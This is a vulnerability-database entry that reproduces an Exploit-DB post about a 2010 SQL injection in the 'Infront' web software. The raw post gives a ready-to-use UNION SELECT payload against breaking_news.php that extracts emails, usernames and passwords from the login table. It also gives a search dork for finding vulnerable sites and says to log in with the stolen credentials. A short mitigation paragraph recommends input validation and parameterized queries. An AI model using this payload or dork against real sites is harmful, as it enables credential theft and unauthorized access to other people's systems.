Infront SQL Injection Vulnerability

vendor:

Infront

by:

TheMaster

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Infront

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Infront SQL Injection Vulnerability

The Infront software is vulnerable to a SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The request contains a malicious SQL query that can be used to extract sensitive information from the database, such as user credentials. The vulnerable file is breaking_news.php and the exploit code is http://target/path/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login. After exploiting the vulnerability, the attacker can login to the server using the extracted credentials.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Infront SQL Injection Vulnerability
# Date: 12-06-2010
# Author: TheMaster <v4m@hotmail.de>
# Software Link: http://www.infront.com/
# Version: N/A
# Tested on: Windows XP SP3

Author : TheMaster <v4m@hotmail.de>
Dork : intext:Powered by Infront
Type of attack : SQLi
File : breaking_news.php
Exploit Code : http://target/path/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login

After , you can login here : http://target/path/login.php

demo : http://server/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login--

GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members